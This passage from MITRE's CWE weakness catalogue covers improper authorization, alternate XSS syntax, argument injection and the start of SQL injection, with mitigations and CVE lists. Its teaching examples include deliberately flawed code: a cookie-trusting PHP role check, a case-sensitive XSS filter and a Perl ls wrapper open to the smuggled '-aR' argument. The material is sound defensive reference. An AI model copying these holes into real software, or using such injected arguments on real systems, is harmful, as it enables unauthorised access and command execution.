along with their associated permissions. A user can create an object (file) and assign specified permissions to that object. + + + + AuthZ + "AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is distinct from "AuthN" (or, sometimes, "AuthC") which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. + + + + + Architecture and Design + Authorization weaknesses may arise when a single-user application is ported to a multi-user environment. + + + Implementation + + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies. + + + + Operation + + + High + + + Confidentiality + Read Application Data + Read Files or Directories + An attacker could read sensitive data, either by reading the data directly from a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to read the data. + + + Integrity + Modify Application Data + Modify Files or Directories + An attacker could modify sensitive data, either by writing the data directly to a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to write the data. + + + Access Control + Gain Privileges or Assume Identity + Bypass Protection Mechanism + An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality. + + + + + Automated Static Analysis + + Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries. + Generally, automated static analysis tools have difficulty detecting custom authorization schemes. Even if they can be customized to recognize these schemes, they might not be able to tell whether the scheme correctly performs the authorization in a way that cannot be bypassed or subverted by an attacker. + + Limited + + + Automated Dynamic Analysis + Automated dynamic analysis may not be able to find interfaces that are protected by authorization checks, even if those checks contain weaknesses. + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms. + + Moderate + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints. + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Host Application Interface Scanner + Fuzz Tester + Framework-based Fuzzer + Forced Path Execution + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + + Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. + Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role. + + + + Architecture and Design + Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7]. + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]. + + + + Architecture and Design + + For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page. + One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page. + + + + System Configuration + Installation + Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs. + + + + + The following code could be for a medical records application. It displays a record to already authenticated users, confirming the user's authorization using a value stored in a cookie. + + $role = $_COOKIES['role'];if (!$role) {$role = getRole('user');if ($role) {// save the cookie to send out in future responsessetcookie("role", $role, time()+60*60*2);}else{ShowLoginScreen();die("\n");}}if ($role == 'Reader') {DisplayMedicalHistory($_POST['patient_ID']);}else{die("You are not Authorized to view this record\n");} + + The programmer expects that the cookie will only be set when getRole() succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can easily set the "role" cookie to the value "Reader". As a result, the $role variable is "Reader", and getRole() is never invoked. The attacker has bypassed the authorization system. + + + + + CVE-2021-39155 + Chain: A microservice integration and management platform compares the hostname in the HTTP Host header in a case-sensitive way (CWE-178, CWE-1289), allowing bypass of the authorization policy (CWE-863) using a hostname with mixed case or other variations. + https://www.cve.org/CVERecord?id=CVE-2021-39155 + + + CVE-2019-15900 + Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863). + https://www.cve.org/CVERecord?id=CVE-2019-15900 + + + CVE-2009-2213 + Gateway uses default "Allow" configuration for its authorization settings. + https://www.cve.org/CVERecord?id=CVE-2009-2213 + + + CVE-2009-0034 + Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges. + https://www.cve.org/CVERecord?id=CVE-2009-0034 + + + CVE-2008-6123 + Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect. + https://www.cve.org/CVERecord?id=CVE-2008-6123 + + + CVE-2008-7109 + Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client. + https://www.cve.org/CVERecord?id=CVE-2008-7109 + + + CVE-2008-3424 + Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access. + https://www.cve.org/CVERecord?id=CVE-2008-3424 + + + CVE-2008-4577 + ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions. + https://www.cve.org/CVERecord?id=CVE-2008-4577 + + + CVE-2006-6679 + Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header. + https://www.cve.org/CVERecord?id=CVE-2006-6679 + + + CVE-2005-2801 + Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied. + https://www.cve.org/CVERecord?id=CVE-2005-2801 + + + CVE-2001-1155 + Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions. + https://www.cve.org/CVERecord?id=CVE-2001-1155 + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2011-05-24 + 1.13 + 2011-06-01 + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Description + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Read Application Data + Execute Unauthorized Code or Commands + + + + + Implementation + Resolve all input to absolute or canonical representations before processing. + + + Implementation + Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + With Struts, write all data from form beans with the bean's filter attribute set to true. + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + In the following example, an XSS neutralization method intends to replace script tags in user-supplied input with a safe equivalent: + + public String preventXSS(String input, String mask) {return input.replaceAll("script", mask);} + + The code only works when the "script" tag is in all lower-case, forming an incomplete denylist (CWE-184). Equivalent tags such as "SCRIPT" or "ScRiPt" will not be neutralized by this method, allowing an XSS attack. + + + + + CVE-2002-0738 + XSS using "&={script}". + https://www.cve.org/CVERecord?id=CVE-2002-0738 + + + + + Alternate XSS syntax + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Name, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, Description, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Alternate XSS Syntax + Failure to Sanitize Alternate XSS Syntax + + + + The product constructs a string for a command to be executed by a separate component + in another control sphere, but it does not properly delimit the + intended arguments, options, or switches within that command string. + + When creating commands using interpolation into a string, developers may assume that only the arguments/options that they specify will be processed. This assumption may be even stronger when the programmer has encoded the command in a way that prevents separate commands from being provided maliciously, e.g. in the case of shell metacharacters. When constructing the command, the developer may use whitespace or other delimiters that are required to separate arguments when the command. However, if an attacker can provide an untrusted input that contains argument-separating delimiters, then the resulting command will have more arguments than intended by the developer. The attacker may then be able to change the behavior of the command. Depending on the functionality supported by the extraneous arguments, this may have security-relevant consequences. + + + + + + + + + + Primary + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Other + Execute Unauthorized Code or Commands + Alter Execution Logic + Read Application Data + Modify Application Data + An attacker could include arguments that allow unintended commands or code to be executed, allow sensitive data to be read or modified or could cause other unintended behavior. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Parameterization + Where possible, avoid building a single string that contains the command and its arguments. Some languages or frameworks have functions that support specifying independent arguments, e.g. as an array, which is used to automatically perform the appropriate quoting or escaping while building the command. For example, in PHP, escapeshellarg() can be used to escape a single argument to system(), or exec() can be called with an array of arguments. In C, code can often be refactored from using system() - which accepts a single string - to using exec(), which requires separate function arguments for each parameter. + High + + + Architecture and Design + Input Validation + Understand all the potential areas where untrusted inputs can enter your product: parameters or arguments, cookies, anything read from the network, environment variables, request headers as well as content, URL components, e-mail, files, databases, and any external systems that provide data to the application. Perform input validation at well-defined interfaces. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained. + + + Implementation + + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control. + Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content. + + + + Implementation + When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so. + + + Implementation + When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined. + + + Testing + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Testing + Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + + + Consider the following program. It intends to perform an "ls -l" on an input filename. The validate_name() subroutine performs validation on the input to make sure that only alphanumeric and "-" characters are allowed, which avoids path traversal (CWE-22) and OS command injection (CWE-78) weaknesses. Only filenames like "abc" or "d-e-f" are intended to be allowed. + + + my $arg = GetArgument("filename"); + do_listing($arg); + + + sub do_listing { + + my($fname) = @_; + if (! validate_name($fname)) { + + print "Error: name is not well-formed!\n"; + return; + + } + # build command + my $cmd = "/bin/ls -l $fname"; + system($cmd); + + } + + sub validate_name { + + my($name) = @_; + if ($name =~ /^[\w\-]+$/) { + + return(1); + + } + else { + + return(0); + + } + + } + + + + However, validate_name() allows + filenames that begin with a "-". An adversary could + supply a filename like "-aR", producing the "ls -l -aR" + command (CWE-88), thereby getting a full recursive + listing of the entire directory and all of its + sub-directories. + + There are a couple possible mitigations for this + weakness. One would be to refactor the code to avoid + using system() altogether, instead relying on internal + functions. + + Another option could be to add a "--" argument + to the ls command, such as "ls -l --", so that any + remaining arguments are treated as filenames, causing + any leading "-" to be treated as part of a filename + instead of another option. + + Another fix might be to change the regular expression used in validate_name to force the first character of the filename to be a letter or number, such as: + + + + if ($name =~ /^\w[\w\-]+$/) ... + + + + + CVE-2016-10033 / [REF-1249] provides a useful real-world example of this weakness within PHPMailer. + The program calls PHP's mail() function to compose and send mail. The fifth argument to mail() is a set of parameters. The program intends to provide a "-fSENDER" parameter, where SENDER is expected to be a well-formed email address. The program has already validated the e-mail address before invoking mail(), but there is a lot of flexibility in what constitutes a well-formed email address, including whitespace. With some additional allowed characters to perform some escaping, the adversary can specify an additional "-o" argument (listing an output file) and a "-X" argument (giving a program to execute). Additional details for this kind of exploit are in [REF-1250]. + + + + + CVE-2022-36069 + Python-based dependency management tool avoids OS command injection when generating Git commands but allows injection of optional arguments with input beginning with a dash, potentially allowing for code execution. + https://www.cve.org/CVERecord?id=CVE-2022-36069 + + + CVE-1999-0113 + Canonical Example - "-froot" argument is passed on to another program, where the "-f" causes execution as user "root" + https://www.cve.org/CVERecord?id=CVE-1999-0113 + + + CVE-2001-0150 + Web browser executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands. + https://www.cve.org/CVERecord?id=CVE-2001-0150 + + + CVE-2001-0667 + Web browser allows remote attackers to execute commands by spawning Telnet with a log file option on the command line and writing arbitrary code into an executable file which is later executed. + https://www.cve.org/CVERecord?id=CVE-2001-0667 + + + CVE-2002-0985 + Argument injection vulnerability in the mail function for PHP may allow attackers to bypass safe mode restrictions and modify command line arguments to the MTA (e.g. sendmail) possibly executing commands. + https://www.cve.org/CVERecord?id=CVE-2002-0985 + + + CVE-2003-0907 + Help and Support center in windows does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an "hcp://" URL. + https://www.cve.org/CVERecord?id=CVE-2003-0907 + + + CVE-2004-0121 + Mail client does not sufficiently filter parameters of mailto: URLs when using them as arguments to mail executable, which allows remote attackers to execute arbitrary programs. + https://www.cve.org/CVERecord?id=CVE-2004-0121 + + + CVE-2004-0473 + Web browser doesn't filter "-" when invoking various commands, allowing command-line switches to be specified. + https://www.cve.org/CVERecord?id=CVE-2004-0473 + + + CVE-2004-0480 + Mail client allows remote attackers to execute arbitrary code via a URI that uses a UNC network share pathname to provide an alternate configuration file. + https://www.cve.org/CVERecord?id=CVE-2004-0480 + + + CVE-2004-0489 + SSH URI handler for web browser allows remote attackers to execute arbitrary code or conduct port forwarding via the a command line option. + https://www.cve.org/CVERecord?id=CVE-2004-0489 + + + CVE-2004-0411 + Web browser doesn't filter "-" when invoking various commands, allowing command-line switches to be specified. + https://www.cve.org/CVERecord?id=CVE-2004-0411 + + + CVE-2005-4699 + Argument injection vulnerability in TellMe 1.2 and earlier allows remote attackers to modify command line arguments for the Whois program and obtain sensitive information via "--" style options in the q_Host parameter. + https://www.cve.org/CVERecord?id=CVE-2005-4699 + + + CVE-2006-1865 + Beagle before 0.2.5 can produce certain insecure command lines to launch external helper applications while indexing, which allows attackers to execute arbitrary commands. NOTE: it is not immediately clear whether this issue involves argument injection, shell metacharacters, or other issues. + https://www.cve.org/CVERecord?id=CVE-2006-1865 + + + CVE-2006-2056 + Argument injection vulnerability in Internet Explorer 6 for Windows XP SP2 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. + https://www.cve.org/CVERecord?id=CVE-2006-2056 + + + CVE-2006-2057 + Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. + https://www.cve.org/CVERecord?id=CVE-2006-2057 + + + CVE-2006-2058 + Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. + https://www.cve.org/CVERecord?id=CVE-2006-2058 + + + CVE-2006-2312 + Argument injection vulnerability in the URI handler in Skype 2.0.*.104 and 2.5.*.0 through 2.5.*.78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches. + https://www.cve.org/CVERecord?id=CVE-2006-2312 + + + CVE-2006-3015 + Argument injection vulnerability in WinSCP 3.8.1 build 328 allows remote attackers to upload or download arbitrary files via encoded spaces and double-quote characters in a scp or sftp URI. + https://www.cve.org/CVERecord?id=CVE-2006-3015 + + + CVE-2006-4692 + Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." + https://www.cve.org/CVERecord?id=CVE-2006-4692 + + + CVE-2006-6597 + Argument injection vulnerability in HyperAccess 8.4 allows user-assisted remote attackers to execute arbitrary vbscript and commands via the /r option in a telnet:// URI, which is configured to use hawin32.exe. + https://www.cve.org/CVERecord?id=CVE-2006-6597 + + + CVE-2007-0882 + Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account. + https://www.cve.org/CVERecord?id=CVE-2007-0882 + + + CVE-2001-1246 + Language interpreter's mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible. + https://www.cve.org/CVERecord?id=CVE-2001-1246 + + + CVE-2019-13475 + Argument injection allows execution of arbitrary commands by injecting a "-exec" option, which is executed by the command. + https://www.cve.org/CVERecord?id=CVE-2019-13475 + + + CVE-2016-10033 + Argument injection in mail-processing function allows writing unxpected files and executing programs using tecnically-valid email addresses that insert "-o" and "-X" switches. + https://www.cve.org/CVERecord?id=CVE-2016-10033 + + + + System Process + + + + Argument Injection or Modification + + + ENV03-C + Sanitize the environment when invoking external programs + + + ENV33-C + Do not call system() + Imprecise + + + STR02-C + Sanitize data passed to complex subsystems + + + 30 + Mail Command Injection + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + At one layer of abstraction, this can overlap other weaknesses that have whitespace problems, e.g. injection of javascript into attributes of HTML tags. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Description, Name, References, Relationships + + + CWE Content Team + MITRE + 2019-09-23 + updated Description, Name, Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Description, Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Anonymous External Contributor + 2021-05-28 + Identified inappropriate demonstrative example, suggested new observed example, applicable language. + + Argument Injection or Modification + Improper Delimitation of Arguments in a Command ('Argument Injection') + + + + The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. + + Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands. + SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or product package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes. + + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Implementation + This weakness typically appears in data-rich applications that save user inputs in a database. + + + High + + + Confidentiality + Read Application Data + Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities. + + + Access Control + Bypass Protection Mechanism + If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password. + + + Access Control + Bypass Protection Mechanism + If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability. + + + Integrity + Modify Application Data + Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack. + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes. + Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis. + + This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Moderate + + + Manual Analysis + Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Database Scanners + + Cost effective for partial 